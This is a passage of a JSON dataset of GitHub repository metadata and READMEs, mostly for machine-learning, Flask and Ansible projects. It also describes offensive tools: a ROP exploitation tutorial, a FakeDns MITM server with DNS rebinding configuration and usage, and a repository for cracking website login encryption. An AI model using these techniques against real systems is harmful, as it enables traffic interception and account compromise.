SRL](https://github.com/ne7ermore/torch-light/tree/master/deep-srl)\n* [BERT](https://github.com/ne7ermore/torch-light/tree/master/BERT)\n* [Relation Network](https://github.com/ne7ermore/torch-light/tree/master/relation-network)\n* [Information Extraction](https://github.com/ne7ermore/torch-light/tree/master/information-extraction)\n* [Pointer Network](https://github.com/ne7ermore/torch-light/tree/master/pointer-network)\n* [coreference](https://github.com/ne7ermore/torch-light/tree/master/coreference)\n\n#### 4. Vision\n* [yolo-v3](https://github.com/ne7ermore/torch-light/tree/master/yolo-v3)\n* [DenseNet](https://github.com/ne7ermore/torch-light/tree/master/DenseNet)\n* [Neural Style](https://github.com/ne7ermore/torch-light/tree/master/neural-artistic-style)\n* [DC Gan](https://github.com/ne7ermore/torch-light/tree/master/dc-gan)\n* [Facial Beauty Prediction](https://github.com/ne7ermore/torch-light/tree/master/facial-beauty-prediction)\n\n#### 5. Special Things\n* [Customize](https://github.com/ne7ermore/torch-light/tree/master/Customize)\n\n#### 6. 
Speech\n* [Voice Conversion](https://github.com/ne7ermore/torch-light/tree/master/voice-conversion)\n\n## Getting Started\n\n### clone code\n```\n$ git clone git@github.com:ne7ermore/torch-light.git\n```\n### train\n\n```\n$ cd torch-light/project\n$ python3 main.py\n```\n\nor\n\n```\n$ cd torch-light/project\n$ python3 corpus.py\n$ python3 main.py\n```\n\nor\n\n```\n$ cd torch-light/project\n$ python3 corpus.py\n$ python3 train.py\n```\n\n## Citation\nIf you find this code useful for your research, please cite:\n```\n@misc{TaoTorchLight,\n author = {Ne7ermore Tao},\n title = {torch-light},\n publisher = {GitHub},\n year = {2020},\n howpublished = {\\url{https://github.com/ne7ermore/torch-light}}\n}\n```\n\n## Contact\nFeel free to contact me if there is any question (Tao liaoyuanhuo1987@gmail.com).\nTao Ne7ermore/ [@ne7ermore](https://github.com/ne7ermore)\n\n## Dependencies\n* [Python 3.5](https://www.python.org)\n* [PyTorch 0.2.0](http://pytorch.org/)\n* [Numpy 1.13.1](http://www.numpy.org/)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zhengmin1989/ROP_STEP_BY_STEP", "link": "https://github.com/zhengmin1989/ROP_STEP_BY_STEP", "tags": [], "stars": 513, "description": "\u4e00\u6b65\u4e00\u6b65\u5b66ROP", "lang": "Python", "repo_lang": "", "readme": "# ROP_STEP_BY_STEP\n\nAuthor Weibo: steamed rice spark http://www.weibo.com/zhengmin1989\n\nArticle address:\nhttp://drops.wooyun.org/author/%E8%92%B8%E7%B1%B3\n\nThe full name of ROP is Return-oriented programming (return-oriented programming), which is an advanced memory attack technology that can\nUsed to bypass various common defenses of modern operating systems (such as DEP, ASLR, etc.). In the tutorial we will bring linux_x86, linux_x64\nAnd the use of ROP in android (arm), welcome to learn.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "python-cmd2/cmd2", "link": "https://github.com/python-cmd2/cmd2", "tags": ["python", "command-line", "cli", "terminal", "shell", "developer-tools", "auto-completion", "scripting", "unicode", "tab-completion", "subcommands"], "stars": 513, "description": "cmd2 - quickly build feature-rich and user-friendly interactive command line applications in Python", "lang": "Python", "repo_lang": "", "readme": "Application Name, Description\n[Jok3r](http://www.jok3r-framework.com),Network & Web Pentest Automation Framework\n[CephFS Shell](https://github.com/ceph/ceph),'[Ceph](https://ceph.com/) is a distributed object, block, and file storage platform'\n[psiTurk](https://psiturk.org),An open platform for science on Amazon Mechanical Turk\n[Poseidon](https://github.com/CyberReboot/poseidon),Leverages software-defined networks (SDNs) to acquire and then feed network traffic to a number of machine learning techniques.\n[Unipacker](https://github.com/unipacker/unipacker),Automatic and platform-independent unpacker for Windows binaries based on emulation\n[tomcatmanager](https://github.com/tomcatmanager/tomcatmanager),A command line tool and python library for managing a tomcat server\n[Expliot](https://gitlab.com/expliot_framework/expliot),Internet of Things (IoT) exploitation framework\n[mptcpanalyzer](),Tool to help analyze mptcp pcaps\n[clanvas](https://github.com/marklalor/clanvas),Command-line client for Canvas by Instructure\n\nOldies but goodie,,\n[JSShell](https://github.com/Den1al/JSShell),An interactive multi-user web JavaScript 
shell.\n[FLASHMINGO](https://github.com/fireeye/flashmingo),Automatic analysis of SWF files based on some heuristics. Extensible via plugins.", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hustlzp/Flask-Boost", "link": "https://github.com/hustlzp/Flask-Boost", "tags": [], "stars": 513, "description": "Flask application generator for boosting your development.", "lang": "Python", "repo_lang": "", "readme": "Flask-Boost\n===========\n\n.. image:: http://img.shields.io/pypi/v/flask-boost.svg\n :target: https://pypi.python.org/pypi/flask-boost\n :alt: Latest Version\n.. image:: http://img.shields.io/pypi/dm/flask-boost.svg\n :target: https://pypi.python.org/pypi/flask-boost\n :alt: Downloads Per Month\n.. image:: http://img.shields.io/pypi/pyversions/flask-boost.svg\n :target: https://pypi.python.org/pypi/flask-boost\n :alt: Python Versions\n.. image:: http://img.shields.io/badge/license-MIT-blue.svg\n :target: https://github.com/hustlzp/Flask-Boost/blob/master/LICENSE\n :alt: The MIT License\n\nFlask application generator for boosting your development.\n\nFeatures\n--------\n\n* **Well Defined Project Structure**\n\n * Use factory pattern to generate Flask app.\n * Use Blueprints to organize controllers.\n * Split controllers, models, forms, utilities, assets, Jinja2 pages, Jinja2 macros into different directories.\n * Organize Jinja2 page assets (HTML, JavaScript, CSS) to the same directory.\n * Organize Jinja2 macro assets (HTML, JavaScript, CSS) to the same directory.\n\n* **Batteries Included**\n\n * Use Flask-SQLAlchemy and Flask-Migrate as database tools.\n * Use Flask-WTF to validate forms.\n * Use Flask-Script to help writing scripts.\n * Use permission_ to define permissions.\n * Use Bootstrap as frontend framework.\n * Use Bower to manage frontend packages.\n * Use Gulp and FIS_ to compile static assets.\n * Use Gunicorn to run Flask app and Supervisor to manage Gunicorn processes.\n * Use Fabric as deployment tool.\n * Use Sentry to log exceptions.\n * Use Nginx to serve static files.\n\n* **Scaffold Commands**\n\n * Generate project files: ``boost new ``\n * Generate controller files: ``boost new controller ``\n * Generate action files: ``boost new action [-t]``\n * Generate form files: ``boost new form
``\n * Generate model files: ``boost new model ``\n * Generate macro files: ``boost new macro `` or ``boost new macro ``\n\n.. _permission: https://github.com/hustlzp/permission\n\nInstallation\n------------\n\n::\n\n pip install flask-boost\n\nDevelopment Guide\n-----------------\n\nInit project\n~~~~~~~~~~~~\n\n::\n\n boost new \n\nSetup backend requirements\n~~~~~~~~~~~~~~~~~~~~~~~~~~\n \n::\n\n cd \n virtualenv venv\n . venv/bin/activate (venv\\Scripts\\activate in Windows)\n pip install -r requirements.txt\n\n**Note**: if you failed in ``pip install -r requirements.txt`` in Windows, try to install package binaries directly:\n\n* pycrpyto: try to follow this article compiling-pycrypto-on-win7-64_, or get the complied pycrypyto library directly: archive_pycrpyto_library_.\n\n.. _compiling-pycrypto-on-win7-64: https://yorickdowne.wordpress.com/2010/12/22/compiling-pycrypto-on-win7-64/\n.. _archive_pycrpyto_library: http://archive.warshaft.com/pycrypto-2.3.1.win7x64-py2.7x64.7z\n\nInit database\n~~~~~~~~~~~~~\n\nCreate database with name ``your_project_name`` and encoding ``utf8``.\n\nUpdate ``SQLALCHEMY_DATABASE_URI`` in ``config/development.py`` as needed.\n\nThen init tables::\n\n python manage.py db upgrade\n\nRun app\n~~~~~~~\n\nRun local server::\n\n python manage.py run\n\nSetup frontend requirements\n~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nInstall Node.js first and then install Bower_, FIS_ and Gulp_ globally::\n\n npm install -g bower\n npm install -g fis\n npm install -g fis-postpackager-simple\n npm install -g gulp\n\nInstall local packages::\n\n npm install\n bower install\n\nRun Gulp watch task\n~~~~~~~~~~~~~~~~~~~\n\n::\n\n gulp watch\n\nLiveReload support\n~~~~~~~~~~~~~~~~~~\n\nInstall LiveReload browser extension from here_.\n\nAnd use ``python manage.py live`` instead of ``python manage.py run`` to start app.\n\n.. _here: http://livereload.com/extensions/\n\nScaffold commands\n~~~~~~~~~~~~~~~~~\n\n::\n\n boost new \n boost new controller \n boost new action [-t]\n boost new form \n boost new model \n boost new macro \n boost new macro \n boost -v\n boost -h\n\nRecommended IDE\n~~~~~~~~~~~~~~~\n\nPyCharm_ is the recommended IDE for Flask-Boost.\n\nRecommended preferences:\n\n* In ``Preferences -> Project -> Project Interpreter``, set ``venv`` as project interpreter.\n* In ``Preferences -> Project -> Project Structure``, set ``application/pages`` and ``application/macros`` as template folders, set ``application`` and ``application/static/css`` as resource folders.\n* In ``Language & Frameworks -> JavaScript -> Bower``, set ``bower.json`` as bower.json.\n\nRecommended PyCharm plugins:\n\n* .ignore\n* Markdown\n* Bootstrap3\n\n.. _PyCharm: https://www.jetbrains.com/pycharm/\n\nFirst Production Deploy\n-----------------------\n\nConfig server\n~~~~~~~~~~~~~\n\nInstall mysql-server, python-virtualenv, git, supervisor, nginx, g++, python-dev, libmysqlclient-dev, libxml2-dev, libxslt-dev on your server.\n\nInstall requirements\n~~~~~~~~~~~~~~~~~~~~\n\n::\n\n git clone **.git\n cd \n virtualenv venv\n . venv/bin/activate\n pip install -r requirements.txt\n\nConfig app\n~~~~~~~~~~\n\nSave ``config/production_sample.py`` as ``config/production.py``, update configs in ``config/production.py`` as needed and transfer it to server.\n\n**Note**: remember to update ``SECRET_KEY`` in ``config/production.py``! 
You can generate random secret key as follows::\n\n>>> import os\n>>> os.urandom(24)\n\nInit database\n~~~~~~~~~~~~~\n\nCreate database with name ``your_project_name`` and encoding ``utf8``.\n\nAnd run::\n\n export MODE=PRODUCTION\n python manage.py db upgrade\n\nCopy config files\n~~~~~~~~~~~~~~~~~\n\nUpdate project root path as needed in ``deploy/nginx.conf`` and ``deploy/supervisor.conf``.\n\n::\n\n cp deploy/flask_env.sh /etc/profile.d/\n cp deploy/nginx.conf /etc/nginx/conf.d/.conf\n cp deploy/supervisor.conf /etc/supervisor/conf.d/.conf\n\nBuild assets\n~~~~~~~~~~~~\n\nInstall Node.js first and then install Bower_, FIS_ and Gulp_ globally::\n\n npm install -g bower\n npm install -g fis\n npm install -g fis-postpackager-simple\n npm install -g gulp\n\nInstall local packages::\n\n npm install\n bower install\n\nThen::\n\n gulp\n python manage.py build\n\n.. _Bower: http://bower.io\n.. _FIS: http://fex-team.github.io/fis-site/\n.. _Gulp: http://gulpjs.com\n\nStart app\n~~~~~~~~~\n\n::\n\n service nginx restart\n service supervisor restart\n\nDaily Production Deploy\n-----------------------\n\nUpdate ``HOST_STRING`` in config with the format ``user@ip``.\n\nCommit your codes and run::\n\n git push && fab deploy\n\nP.S. If you wanna to deploy flask with Apache2, see this_ post.\n\n.. _this: https://www.digitalocean.com/community/tutorials/how-to-use-apache-http-server-as-reverse-proxy-using-mod_proxy-extension\n\nLicense\n-------\n\nMIT\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "neurokernel/neurokernel", "link": "https://github.com/neurokernel/neurokernel", "tags": ["drosophila", "gpu", "neural", "brain", "simulation"], "stars": 513, "description": "Neurokernel Project", "lang": "Python", "repo_lang": "", "readme": ".. -*- rst -*-\n\n.. image:: https://raw.githubusercontent.com/neurokernel/neurokernel/master/docs/source/_static/logo.png\n :alt: Neurokernel\n\nPackage Description\n-------------------\n\n`Project Website `_ |\n`GitHub Repository `_ |\n`Online Documentation `_ |\n`Mailing List `_ |\n`Forum `_\n\nNeurokernel is a Python framework for developing models of\nthe fruit fly brain and executing them on multiple NVIDIA GPUs.\n\n.. image:: http://prime4commit.com/projects/98.svg\n :target: http://prime4commit.com/projects/98\n :alt: Support the project\n\nPrerequisites\n-------------\nNeurokernel requires\n\n* Linux (other operating systems may work, but have not been tested);\n* Python;\n* at least one NVIDIA GPU with `Fermi\n `_\n architecture or later;\n* NVIDIA's `GPU drivers `_;\n* `CUDA `_ 5.0 or later;\n* `OpenMPI `_ 1.8.4 or later compiled with CUDA support.\n\nTo check what GPUs are in your system, you can use the `inxi\n`_ command available on most Linux\ndistributions::\n\n inxi -G\n\nYou can verify that the drivers are loaded as follows::\n\n lsmod | grep nvidia\n\nIf no drivers are present, you may have to manually load them by running\nsomething like::\n\n modprobe nvidia\n\nas root.\n\nAlthough some Linux distributions do include CUDA in their stock package\nrepositories, you are encouraged to use those distributed by NVIDIA because they\noften are more up-to-date and include more recent releases of the GPU drivers.\nSee `this page `_ for download\ninformation.\n\nIf you install Neurokernel in a virtualenv environment, you will need to\ninstall OpenMPI. See `this page\n`_\nfor OpenMPI installation information. *Note that OpenMPI 1.8* |openmpi_no_windows|_.\n\n.. 
_openmpi_no_windows: https://www.open-mpi.org/software/ompi/v1.6/ms-windows.php\n.. |openmpi_no_windows| replace:: *cannot run on Windows*\n\nSome of Neurokernel's demos require either `ffmpeg `_ or `libav\n`_ installed to generate visualizations (see `Examples`_).\n\nInstallation\n------------\n\nConda\n^^^^^\nThe easiest way to get neurokernel is to install it in a conda environment: ::\n\n conda create -n nk python=3.7 c-compiler compilers cxx-compiler openmpi -c conda-forge -y\n conda activate nk\n python -m pip install neurokernel\n\nMake sure to enable CUDA support in the installed OpenMPI by setting: ::\n\n export OMPI_MCA_opal_cuda_support=true\n\nExamples\n--------\nIntroductory examples of how to use Neurokernel to build and integrate models of different\nparts of the fly brain are available in the `Neurodriver\n`_ package. To install it run the\nfollowing: ::\n\n git clone https://github.com/neurokernel/neurodriver\n cd ~/neurodriver\n python setup.py develop\n\nOther models built using Neurokernel are available on\n`GitHub `_.\n\nBuilding the Documentation\n--------------------------\nTo build Neurokernel's HTML documentation locally, you will need to install\n\n* `mock `_ 1.0 or later.\n* `sphinx `_ 1.3 or later.\n* `sphinx_rtd_theme `_ 0.1.6 or\n later.\n\nOnce these are installed, run the following: ::\n\n cd ~/neurokernel/docs\n make html\n\nAuthors & Acknowledgements\n--------------------------\nSee the included `AUTHORS`_ file for more information.\n\n.. _AUTHORS: AUTHORS.rst\n\nLicense\n-------\nThis software is licensed under the `BSD License\n`_.\nSee the included `LICENSE`_ file for more information.\n\n.. _LICENSE: LICENSE.rst\n\nNotes\n-----\nThe Neurokernel Project is independent of the NeuroKernel Operating System\ndeveloped by `NeuroDNA Computer `_.\n", "readme_type": "rst", "hn_comments": "Based on the current rate of processor development we will probably be able to model a human brain in realtime around 2045 on a supercomputer.We can model the processing of a human now but it is exceedingly slow, and it is just toy calculations. So even if we can model a mind in 2045 it will may be a long time after that before it can be done in a meaningful way.In the meantime we will probably be able to model humans in a more simplistic way. Our external interactions are simple. If we can record all interactions of a person over time we can develop a cognitive profile and develop a 'beta' copy of that person. Not a real thinking AI, but to someone interacting with that copy essentially the real thing.People are working on this topic now but they're a long way away. I'm guessing 2035.There is a similar project called OpenWorm, that aims to simulate a nematode completely. It's pretty cool, you should check it outhttp://www.openworm.org/Quoting from the course front page:Students with extensive software engineering experience (systems software, parallel programming or computer graphics) are strongly encouraged to apply.Almost makes me want to go back to grad school. Look at these folks, they made GPU-enabled code available as Python's SciKit[1]But then I see they're patenting stuff left and right [2] and my enthusiasm for this project dwindles....[1] http://www.bionet.ee.columbia.edu/code/scikits.cuda[2] http://www.bionet.ee.columbia.edu/patents/There is another project in prospect - CruzPa - that attempts to model a human brain specifically selected for its apparent simplicity. 
http://www.buzzfeed.com/ilanbenmeir/the-most-controversial-t...According to the specs a fruit fly is smarter than my mobile.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ansible/ansible-jupyter-kernel", "link": "https://github.com/ansible/ansible-jupyter-kernel", "tags": [], "stars": 513, "description": "Jupyter Notebook Kernel for running Ansible Tasks and Playbooks", "lang": "Python", "repo_lang": "", "readme": "# Ansible Jupyter Kernel\n\n[![Build Status](https://travis-ci.com/ansible/ansible-jupyter-kernel.svg?branch=master)](https://travis-ci.com/ansible/ansible-jupyter-kernel)\n[![Binder](https://mybinder.org/badge.svg)](https://mybinder.org/v2/gh/ansible/ansible-jupyter-kernel/master)\n\n\n\n![Example Jupyter Usage](https://raw.githubusercontent.com/ansible/ansible-jupyter-kernel/master/docs/example_session.png)\n\nThe Ansible [Jupyter](http://jupyter.readthedocs.io/en/latest/) Kernel adds a kernel backend for Jupyter to interface directly with Ansible and construct plays and tasks and execute them on the fly.\n\n## Demo\n\n[![Demo](https://raw.githubusercontent.com/ansible/ansible-jupyter-kernel/master/docs/ansible_jupyter_kernel_vimeo.png)](https://vimeo.com/279049946 \"Run Ansible Tasks from Jupyter Notebook - Click to Watch!\")\n\n\n## Table of Contents\n\n* [Installation](#installation)\n * [From pypi](#from-pypi)\n * [From a local checkout](#from-a-local-checkout)\n* [Usage](#usage)\n * [Using the cells](#using-the-cells)\n * [Examples](#examples)\n* [Using the development environment](#using-the-development-environment)\n\n## Installation:\n\n`ansible-kernel` is available to be installed from pypi but you can also install it locally. The setup package itself will register the kernel\nwith `Jupyter` automatically.\n\n### From pypi\n\n pip install ansible-kernel\n python -m ansible_kernel.install\n\n### From a local checkout\n\n pip install -e .\n python -m ansible_kernel.install\n\n### For Anaconda/Miniconda\n\n pip install ansible-kernel\n python -m ansible_kernel.install --sys-prefix\n\n## Usage\n\n### Local install\n\n```\n jupyter notebook\n # In the notebook interface, select Ansible from the 'New' menu\n```\n\n### Container\n\n docker run -p 8888:8888 benthomasson/ansible-jupyter-kernel\n\n Then copy the URL from the output into your browser:\n http://localhost:8888/?token=ABCD1234\n\n\n## Using the Cells\n\nNormally `Ansible` brings together various components in different files and locations to launch a playbook and performs automation tasks. For this\n`jupyter` interface you need to provide this information in cells by denoting what the cell contains and then finally writing your tasks that will make\nuse of them. 
There are [Examples](#examples) available to help you, in this section we'll go over the currently supported cell types.\n\nIn order to denote what the cell contains you should prefix it with a pound/hash symbol (#) and the type as listed here as the first line as shown in the examples\nbelow.\n\n#### #inventory\n\nThe inventory that your tasks will use\n\n```\n#inventory\n[all]\nahost ansible_connection=local\nanotherhost examplevar=val\n```\n\n#### #play\n\nThis represents the opening block of a typical `Ansible` play\n\n```\n#play\nname: Hello World\nhosts: all\ngather_facts: false\n```\n\n#### #task\n\nThis is the default cell type if no type is given for the first line\n\n```\n#task\ndebug:\n```\n\n```\n#task\nshell: cat /tmp/afile\nregister: output\n```\n\n#### #host_vars\n\nThis takes an argument that represents the hostname. Variables\ndefined in this file will be available in the tasks for that host.\n\n```\n#host_vars Host1\nhostname: host1\n```\n\n#### #group_vars\n\nThis takes an argument that represents the group name. Variables\ndefined in this file will be available in the tasks for hosts in that\ngroup.\n\n```\n#group_vars BranchOfficeX\ngateway: 192.168.1.254\n```\n\n#### #vars\n\nThis takes an argument that represents the filename for use in later cells\n\n```\n#vars example_vars\nmessage: hello vars\n```\n\n```\n#play\nname: hello world\nhosts: localhost\ngather_facts: false\nvars_files:\n - example_vars\n```\n\n#### #template\n\nThis takes an argument in order to create a templated file that can be used in later cells\n\n```\n#template hello.j2\n{{ message }}\n```\n\n```\n#task\ntemplate:\n src: hello.j2\n dest: /tmp/hello\n```\n\n#### #ansible.cfg\n\nProvides overrides typically found in ansible.cfg\n\n```\n#ansible.cfg\n[defaults]\nhost_key_checking=False\n```\n\n### Examples\n\nYou can find various [example notebooks in the repository](https://github.com/ansible/ansible-jupyter-kernel/tree/master/notebooks)\n\n## Using the development environment\n\nIt's possible to use whatever python development process you feel comfortable with. The repository itself includes mechanisms for\nusing [pipenv](https://github.com/pypa/pipenv)\n\n```\npipenv install\n...\npipenv shell\n```\n", "readme_type": "markdown", "hn_comments": "I have been making Jupyter notebook for managing our container environment. Some work is still only possible through Ansible, so I've been wondering how to integrate that. Well, I need not wonder no more!This looks very promising:* auto completion!* integrated documentation!* exporting Ansible YAML!I didn't yet have change to play with this, so I just note the ways I see Jupyter can be good fit for Ansible. You can try each step and see it working before moving to next one. There doesn't seem to be support yet for richer results view nor Jupyter Widgets, but imagine looking at actual error messages and result views instead of JSON as text. Getting and setting parameters for playbooks could be done using external data sources instead of hand-crafting inventories and config files. You could use same approach as Ara [1] and trace execution of tasks.I assume you can run Ansible kernel from JupyterLab instance, so you can do file management and use terminal right on the machine you're running Ansible commands. Also, I'd imagine connecting with Jupyter Console (formerly IPython) to same kernel state as notebook is running with is possible here as well. 
This provides Terminal goodness alongside browser's visuals.[1] Ara: http://ara.readthedocs.io/en/latest/I really like the idea of notebooks for ops tasks - its a great combination of code, documentation and step by step execution. I'm surprised it is not more popular.Until there is a meaningful `git diff` for jupyter notebooks I can't see them being a step in the right direction for anything but transient experiments (and of course what Jypyter is great at; communication, documentation, low barriers etc.)I... don\u2019t get the use case for this? What am I missing?Reminds me of the \"Literate Devops with Emacs\" article that has been discussed on HN before. Orgmode is well suited for this sort of thing:https://news.ycombinator.com/item?id=16559004", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Crypt0s/FakeDns", "link": "https://github.com/Crypt0s/FakeDns", "tags": [], "stars": 513, "description": "A regular-expression based python MITM DNS server with support for DNS Rebinding attacks", "lang": "Python", "repo_lang": "", "readme": "FakeDns\n=======\nUpdate 4/14/2020 - Python 2 support removed and code swapped to Python3\n\nNow with round-robin & improved options!\n\nBugs:\n@crypt0s - Twitter\n\nbryanhalf@gmail.com - Email\n\n\nA python regular-expression based DNS server!\n\n USAGE:\n ./fakedns.py [-h] -c Config path [-i interface IP address] [--rebind]\n\nThe dns.conf should be set the following way:\n\n [RECORD TYPE CODE] [python regular expression] [answer] [rebind answer]\n\nThe answer could be a ip address or string `self`,\nthe `self` syntax sugar will be translated to your current machine's local ip address, such as `192.168.1.100`.\n\nIf a match is not made, the DNS server will attempt to resolve the request using whatever you have your DNS server set to on your local machine and will proxy the request to that server on behalf of the requesting user.\n\n\nSupported Request Types\n=======================\n - A\n - TXT\n - AAAA\n - PTR\n - SOA\n\nIn-Progress Request Types\n=========================\n - MX\n - CNAME\n\nMisc\n====\n - Supports DNS Rebinding\n - Supports round-robin\n\nRound-Robin\n===========\nRound-robin rules are implemented. Every time a client requests a matching rule, FakeDNS will serve out the next IP in the list of IP's provided in the rule. \nA list of IP's is comma-separated.\n\n\nFor example:\n\n A robin.net 1.2.3.4,1.1.1.1,2.2.2.2\n\nIs a round-robin rule for robin.net which will serve out responses pointing to 1.2.3.4, 1.1.1.1, and 2.2.2.2, iterating through that order every time a request is made by any client for the robin.net entry.\n\n*NOTE* : These IP's aren't included as a list to the client in the response - they still only get just one IP in the response (could change that later)\n\nDNS Rebinding\n=============\nFakeDNS supports rebinding rules, which basically means that the server accepts a certain number of requests from a client for a domain until a threshold (default 1 request) and then it changes the IP address to a different one.\n\nFor example:\n\n A rebind.net 1.1.1.1 10%4.5.6.7\n\nMeans that we have an A record for rebind.net which evaluates to 1.1.1.1 for the first 10 tries. 
On the 11th request from a client which has already made 10 requests, FakeDNS starts serving out the second ip, 4.5.6.7\n\nYou can use a list of addresses here and FakeDNS will round-robin them for you, just like in the \"regular\" rule.\n\n\nTesting FakeDNS in Docker\n======\n_(localhost only without extra steps)_\n\nI have had a lot of success testing/developing FakeDNS in Docker because it's easier than running it natively on modern Ubuntu installs which have their own DNS services running on port 53 already.\n\nIf you want to try it out, you can do so without much heavy lifting by following these steps:\n\nAssuming you are **_inside the FakeDns directory_**: `sudo docker run --interactive --tty --volume \\`pwd\\`:/opt/FakeDns -p 5353:53/udp python:3.8 /opt/FakeDns/fakedns.py -c /opt/FakeDns/dns.conf.example`. And to test you can run `nslookup -port=5353 testrule.test 127.0.0.1` which should return `1.1.1.1` on your first request\n\nOr, if you'd like to use docker-compose, simply run `docker-compose up` and use the same test as above.", "readme_type": "markdown", "hn_comments": "Clickable link: https://filippo.io/fakenews/Does this only work with OpenSea projects today? What other NFT marketplaces do you plan to support in the future?Can you explain a bit how you know wether or not there's a scam going on with an NFT in a marketplace?Hello fellow Hackers, Saoud from Fakespot here.We are excited to announce the latest product in the Fakespot suite, NFT Guard!This extension will provide verification of NFT collections/NFTs on OpenSea (for first release, we are planning other marketplaces based on user/community feedback) and the detection of scam mint sites that will steal your tokens once a wallet is connected.Please leave comments here and I'd be more than happy to answer them!\"Infiltrated\" implies there was a state other than \"saturated\"Certainly would not have trusted the company with so much money if Sequoia's name wasn't plastered all over its marketing.Happy to share more details / proof in the comments. HN restricted the length of the post to 2k chars.HN: what can I do?Clickable links:https://coinswitch.co/https://coinswitch.co/termshttps://coinswitch.co/app/exchange/transaction/28f07022-4ab2...https://www.sequoiacap.com/companies/Tampering with the seal is just one way to do it. When I worked in transportation, we saw an operation that could take trailer doors off a truck, simultaneously, with out breaking the seal. And put them back on when they are done. We've also seen people cut holes in the side panels and patch them when they are finished.It's an interesting idea. Maybe it creates a \"harder door to kick in\" and criminals will target containers with non crypto seals.It seems like a cool idea but how would it stop the smuggling? 
The freight companies could just load the container with the contraband before they lock it up.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "onepureman/spider_draft", "link": "https://github.com/onepureman/spider_draft", "tags": [], "stars": 514, "description": "\u5404\u79cd\u7f51\u7ad9\u7684\u767b\u9646\u7834\u89e3\uff0c\u4ec5\u4f9b\u4ea4\u6d41\u5b66\u4e60\uff0c\u5305\u62ec\uff1a126\u90ae\u7bb1,17173,189\u90ae\u7bb1,360\u767b\u5f55\u4e2d\u5fc3,37\u73a9,39\u5065\u5eb7,51\u6e38\u620f,58\u540c\u57ce,bilibili,YY\u76f4\u64ad,\u4e00\u52a0\u624b\u673a,\u4e2d\u56fd\u79fb\u52a8,\u4e5d\u6e38,\u4eca\u65e5\u5934\u6761,\u4f01\u67e5\u67e5,\u4f18\u9177\u89c6\u9891,\u4fe1\u606f\u516c\u793a\u7cfb\u7edf,\u51e4\u51f0\u7f51,\u53bb\u54ea\u513f,\u542f\u4fe1\u5b9d,\u548c\u8baf\u7f51,\u54aa\u5495\u89c6\u9891\u767b\u5f55,\u552f\u54c1\u4f1a,\u559c\u9a6c\u62c9\u96c5,\u56fd\u7f8e,\u5927\u4f17\u70b9\u8bc4,\u5927\u9ea6\u7f51,\u5929\u773c\u67e5,\u597d\u8c46\u83dc\u8c31,\u5b9c\u8d37\u7f51,\u5c0f\u7c73\u5546\u57ce,\u5f00\u6e90\u4e2d\u56fd,\u5fae\u535a,\u6052\u4fe1\u6613\u8d37,\u623f\u5929\u4e0b,\u641c\u623f\u5e2e,\u641c\u72d0,\u641c\u72d0\u89c6\u9891,\u641c\u72d7\u7ffb\u8bd1,\u6597\u9c7c,\u65b0\u534e\u7535\u5b50\u90ae\u5c40,\u6613\u8f66\u7f51,\u6709\u8d5e\u7f51,\u6dd8\u5b9d,\u7231\u4f01\u67e5,\u7231\u5e94\u7528,\u732b\u773c,\u73cd\u7231\u7f51,\u767e\u5bb6\u53f7,\u7a7a\u4e2d\u7f51,\u7b51\u9f99\u5b66\u793e,\u7c89\u7b14\u7f51,\u7eb5\u6a2a\u5c0f\u8bf4\u7f51,\u7f51\u6613,\u7f8e\u56e2,\u8001k\u6e38\u620f,\u8054\u901a\u8425\u4e1a\u5385,\u805a\u60e0\u5546\u57ce,\u8292\u679cTV,\u864e\u7259,\u8c46\u74e3,\u9014\u725b,\u9017\u6e38\u7f51,\u91d1\u725b\u7406\u8d22,\u95ee\u5377\u661f,\u963f\u91cc\u4e91,\u98ce\u884c\u7f51,\u98de\u5362\u5c0f\u8bf4\u7f51,\u9b45\u65cf\u3001\u3001\u3001", "lang": "Python", "repo_lang": "", "readme": "## #Dedicated to the js cracking of the login of various websites, which is continuously updated. . . (Due to working hours, many websites cannot be completed at one time and will be updated all the time)\n(Also: Crawlers that will supplement various website data later)\n\n####At present, it mainly cracks the js encryption of website login. The use of js to crack the click verification has not yet been involved. At present, the cracking of these two verification codes is mainly selenium, but I want to use js to crack it. 
I am studying js cracking at the same time The selenium solution will also be provided, please move to another project of mine ([Click to enter the project, currently this project will not be updated due to the completion of js cracking the verification code](https://github.com/onepureman/ selenium_login_cracking))\n\n### If you have big cows or are interested, you can communicate and give advice, or you can private message me to do some learning things together: [My Blog](https://blog.csdn.net/amanloveformi).\n\n\n\n\n# Tianyancha sliding login has been cracked, and issues such as sliding verification in subsequent projects will be updated one by one\n\n\nDisclaimer here: This project is only for learning and communication, not for commercial use, otherwise the consequences will be borne by the user!", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "liberize/alfred-dict-workflow", "link": "https://github.com/liberize/alfred-dict-workflow", "tags": [], "stars": 512, "description": "A multi-feature, fast and handy alfred dictionary workflow.", "lang": "Python", "repo_lang": "", "readme": "# Alfred word search expansion\n\nVersatile, fast and easy-to-use Alfred word lookup extension.\n\n**Please go to the release page to download the latest workflow and double-click to install it. **\n\n**For the convenience of use, please set the shortcut keys for word retrieval. **\n\n## Use the system's built-in Oxford dictionary\n\nSince the macOS dictionary format changes with each update, the latest version is not guaranteed to work and support for older versions will be removed.\n\nThe current version only supports 10.13. For systems below 10.13, please use the old version of workflow.\n\nFirst open Dictionary.app and install the Oxford English-Chinese Chinese-English Dictionary.\n\nThen install lxml :\n\n command -v pip || sudo easy_install pip\n sudo pip install lxml\n\n## Introduction\n\n* Supported dictionaries:\n * System dictionary, supports Landau and Oxford dictionaries\n * Youdao Online Dictionary\n * iCiBa Online Dictionary\n * Baidu Online Dictionary\n * Bing Online Dictionary\n * Sea words online dictionary\n* Support English-Chinese and Chinese-English mutual checking\n* Support phonetic symbols, the default display American phonetic symbols\n* Pronounced using the system TTS engine\n* Paraphrases can be quickly copied\n* Shortcut keys can be used to switch dictionaries\n* Cache query results to facilitate next query\n* Support shortcut keys to 